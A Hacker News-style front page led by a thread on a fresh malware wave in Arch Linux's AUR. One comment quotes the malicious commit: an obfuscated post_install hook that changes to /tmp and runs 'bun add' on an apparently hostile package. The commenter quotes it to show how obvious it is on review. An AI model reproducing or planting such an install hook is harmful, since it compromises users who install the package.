frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Open in hackernews

Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack

https://www.phoronix.com/news/Arch-Linux-AUR-More-Malware
23•ImJamal•1h ago

Comments

7e•53m ago
Companies like Anthropic and OpenAI need to sponsor open source projects by giving them free agent credits. Otherwise, bad actors can just outspend and totally overwhelm the somewhat dim and very overworked set of human maintainers. Humans in software are obsolete, full stop.
micaeked•49m ago
Both already do that. The AUR stuff is more of a policy issue and unmatched expectations, unrelated to llms imo
cyphar•7m ago
[delayed]
Shank•42m ago
Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?
cge•25m ago
The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}

[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...

ArkDisk – Managed Nextcloud on owned EU bare-metal with per-user ZFS snapshots

https://arkdisk.com/
1•ChristopherArk•2m ago•0 comments

Chameleon Ultra: a flashdrive sized NFC toolkit

https://github.com/RfidResearchGroup/ChameleonUltra
2•elisaado•4m ago•0 comments

Domination Without Hegemony and the Limits of US World Power

https://www.researchgate.net/profile/Corey-Payne/publication/363778292_Domination_Without_Hegemon...
2•hackandthink•5m ago•0 comments

I indexed 669 GB of my GoPro videos using my M1 Max computer and local ML models

3•iliashad•8m ago•0 comments

2026 Council Manifesto

https://blogs.gentoo.org/mgorny/2026/06/11/2026-council-manifesto/
1•jruohonen•9m ago•0 comments

Measles surge in Utah sparks fears US could undo decades of progress

https://www.dailymail.com/news/article-15897903/measles-surge-utah-US-elimination-status.html
1•Bender•9m ago•0 comments

Pouta Forms, open-source alternative to TypeForm

https://github.com/pouta-cms/form
1•mohanjith•9m ago•0 comments

Parsing JSON at compile time with C++26 static reflection

https://lemire.me/blog/2026/06/14/parsing-json-at-compile-time-with-c26-static-reflection/
1•chmaynard•10m ago•0 comments

Hill charts with MCP server and give visibility

https://hillch.art/en
1•Jeronattend•11m ago•0 comments

Amazon says its datacenters used about 2.5B gallons of water last year

https://www.theregister.com/on-prem/2026/06/12/amazon-owns-up-to-using-25bn-gallons-of-h2o-in-its...
1•tcp_handshaker•12m ago•1 comments

Hands-On with Flink: Calling LLMs from Flink

https://medium.com/@katyagorshkova/hands-on-with-flink-part-6-calling-llms-from-flink-e5cc7e5f0440
1•tanelpoder•13m ago•0 comments

Ponytail – make your AI agent think like the laziest senior dev in the room

https://github.com/DietrichGebert/ponytail
2•mellosouls•14m ago•0 comments

SpaceX Forecasted to Burn $350B by 2030

https://www.youtube.com/watch?v=N5jnH9eH_Vg
1•tcp_handshaker•16m ago•1 comments

Elon Musk drifted from Larry Page 10+yrs ago, companies now closer than ever

https://www.cnbc.com/2026/06/14/elon-musk-drifted-from-larry-page-but-spacex-google-closer-than-e...
1•1vuio0pswjnm7•17m ago•0 comments

Splunk Enterprise Vulnerabilities Allow Unauthenticated File Operations

https://orca.security/resources/blog/cve-2026-20253-splunk-enterprise-rce-unauthenticated-file-op...
1•hliyan•19m ago•0 comments

N-Tier Services and Systems Complexity

https://yegge.ai/listings/services-and-complexity
1•bobbiechen•19m ago•0 comments

How much of Elon Musk's wealth comes from government help? Virtually all of it

https://www.rnz.co.nz/news/world/598157/how-much-of-elon-musk-s-wealth-comes-from-government-help...
10•totetsu•21m ago•4 comments

Where Wizards Stay Up Late – A Book Review (2024)

https://www.neilobrien.co.uk/p/where-wizards-stay-up-late
2•initramfs•22m ago•0 comments

Story of human evolution rewritten after 1.8M-year-old cave discovery

https://www.dailymail.com/sciencetech/article-15886169/human-evolution-fire-wonderwerk-cave-disco...
1•Bender•24m ago•0 comments

Starmer to announce social media curfew and chatbot ban for teenagers

https://www.thetimes.com/uk/politics/article/social-media-ban-keir-starmer-qcmskxc5z
3•poisonfountain•25m ago•0 comments

Perlisisms

https://www.cs.yale.edu/homes/perlis-alan/quotes.html
3•tosh•25m ago•1 comments

Cloud-based LLM gold rush is ending

https://automato.substack.com/p/apple-wwdc-and-the-fable-5-embargo
10•andrewstetsenko•26m ago•0 comments

Podcast: Book Interview: Signals and Levers • Elisabeth Hendrickson, Joel Tosi [video]

https://www.youtube.com/watch?v=8tNtZMm3Hyc&list=PLEx5khR4g7PJbSLmADahf0LOpTLifiCra
1•chhum•28m ago•0 comments

Moats Need Models

https://twitter.com/sahar__zadeh/status/2064759511253176398
1•gmays•29m ago•0 comments

I built InstaTakker – a portable desktop Instagram workflow manager for Windows

https://github.com/issaghostlife/instatakker-app
1•issaghostlife•30m ago•1 comments

UK set to announce social media ban for under-16s

https://www.manchestereveningnews.co.uk/news/uk-news/uk-set-announce-social-media-34119132
68•beejiu•31m ago•55 comments

Ask HN: Is Coding Solved?

2•champagnepapi•32m ago•4 comments

Signal says UK plan to scan devices for nude images 'endangers us all'

https://www.theregister.com/security/2026/06/09/signal-uks-child-nude-block-threat-wont-protect-c...
6•Bender•32m ago•0 comments

Show HN: Öcha – A minimalist, Kindle-style RSS and newsletter reader

https://readocha.com/
3•pavn•32m ago•0 comments

US Army picks out Vampire to fill a gap in its layered drone defenses

https://www.theregister.com/offbeat/2026/06/14/us-army-picks-out-vampire-to-fill-a-gap-in-its-lay...
1•Bender•32m ago•0 comments